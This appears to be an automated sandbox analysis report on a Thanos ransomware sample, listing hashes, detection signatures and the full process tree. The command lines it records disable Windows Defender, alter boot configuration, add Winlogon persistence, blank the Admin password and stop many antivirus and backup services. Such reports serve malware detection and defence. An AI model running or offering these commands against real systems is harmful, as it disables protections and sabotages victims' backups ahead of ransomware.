Analysis

  • max time kernel
    3s
  • max time network
    2s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-05-2021 09:57

General

  • Target

    b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe

  • Size

    393KB

  • MD5

    104b68a8b7e2913139049b30847f990f

  • SHA1

    0f25791a039298be94a3d024f5a3d1796e13a587

  • SHA256

    b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424

  • SHA512

    cba38f93247621cc38ea33f72efc1147e0a6d1a8b9256a26853ac3c1c8c3c9444d2d3a5af586e934febad1822c93fbc1e9c538759b4587720ba03a92792ce04d

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Thanos Ransomware

    Ransomware-as-a-service (RaaS) sold through underground forums.

  • Thanos executable 2 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Users\Admin\AppData\Local\Temp\file.exe
      "file.exe"
      2⤵
      • Executes dropped EXE
      • Windows security modification
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1152
      • C:\Windows\system32\reg.exe
        "reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
        3⤵
        • Modifies registry key
        PID:1344
      • C:\Windows\system32\bcdedit.exe
        "bcdedit.exe" /set {default} safeboot network
        3⤵
        • Modifies boot configuration data using bcdedit
        PID:1364
      • C:\Windows\system32\reg.exe
        "reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\file.exe","C:\Windows\system32\userinit.exe" /f
        3⤵
        • Modifies WinLogon for persistence
        PID:612
      • C:\Windows\system32\net.exe
        "net.exe" user Admin ""
        3⤵
          PID:1944
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user Admin ""
            4⤵
              PID:1660
          • C:\Windows\system32\shutdown.exe
            "shutdown.exe" /r /t 0
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" Get-MpPreference -verbose
            3⤵
              PID:1528
            • C:\Windows\system32\net.exe
              "net.exe" stop mfewc /y
              3⤵
                PID:1644
              • C:\Windows\system32\net.exe
                "net.exe" stop NetBackup BMR MTFTP Service /y
                3⤵
                  PID:1740
                • C:\Windows\system32\net.exe
                  "net.exe" stop VeeamDeploymentService /y
                  3⤵
                    PID:1576
                  • C:\Windows\system32\net.exe
                    "net.exe" stop VeeamTransportSvc /y
                    3⤵
                      PID:328
                    • C:\Windows\system32\net.exe
                      "net.exe" stop VSNAPVSS /y
                      3⤵
                        PID:1792
                      • C:\Windows\system32\net.exe
                        "net.exe" stop stc_raw_agent /y
                        3⤵
                          PID:1820
                        • C:\Windows\system32\net.exe
                          "net.exe" stop zhudongfangyu /y
                          3⤵
                            PID:1756
                          • C:\Windows\system32\net.exe
                            "net.exe" stop YooIT /y
                            3⤵
                              PID:1928
                            • C:\Windows\system32\net.exe
                              "net.exe" stop YooBackup /y
                              3⤵
                                PID:1984
                              • C:\Windows\system32\net.exe
                                "net.exe" stop QBCFMonitorService /y
                                3⤵
                                  PID:1380
                                • C:\Windows\system32\net.exe
                                  "net.exe" stop Intuit.QuickBooks.FCS /y
                                  3⤵
                                    PID:1208
                                  • C:\Windows\system32\net.exe
                                    "net.exe" stop QBIDPService /y
                                    3⤵
                                      PID:480
                                    • C:\Windows\system32\net.exe
                                      "net.exe" stop QBFCService /y
                                      3⤵
                                        PID:916
                                      • C:\Windows\system32\net.exe
                                        "net.exe" stop RTVscan /y
                                        3⤵
                                          PID:960
                                        • C:\Windows\system32\net.exe
                                          "net.exe" stop SavRoam /y
                                          3⤵
                                            PID:812
                                          • C:\Windows\system32\net.exe
                                            "net.exe" stop ccSetMgr /y
                                            3⤵
                                              PID:1192
                                            • C:\Windows\system32\net.exe
                                              "net.exe" stop ccEvtMgr /y
                                              3⤵
                                                PID:1488
                                              • C:\Windows\system32\net.exe
                                                "net.exe" stop DefWatch /y
                                                3⤵
                                                  PID:580
                                                • C:\Windows\system32\net.exe
                                                  "net.exe" stop BMR Boot Service /y
                                                  3⤵
                                                    PID:1316
                                                  • C:\Windows\system32\net.exe
                                                    "net.exe" stop McAfeeDLPAgentService /y
                                                    3⤵
                                                      PID:1652
                                                    • C:\Windows\system32\net.exe
                                                      "net.exe" stop avpsus /y
                                                      3⤵
                                                        PID:1076
                                                  • C:\Windows\system32\LogonUI.exe
                                                    "LogonUI.exe" /flags:0x0
                                                    1⤵
                                                      PID:1772
                                                    • C:\Windows\system32\conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe "188095522-175523635295267694-1013923470-2110761987932423451-1786827165-40800582"
                                                      1⤵
                                                        PID:1344

                                                      Network

                                                      MITRE ATT&CK Enterprise v6

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • memory/1152-73-0x000000001AC80000-0x000000001AC82000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/1152-63-0x0000000000F00000-0x0000000000F01000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      • memory/1772-70-0x000007FEFB571000-0x000007FEFB573000-memory.dmp

                                                        Filesize

                                                        8KB

                                                      • memory/1772-95-0x0000000002840000-0x0000000002841000-memory.dmp

                                                        Filesize

                                                        4KB

                                                      We care about your privacy.

                                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.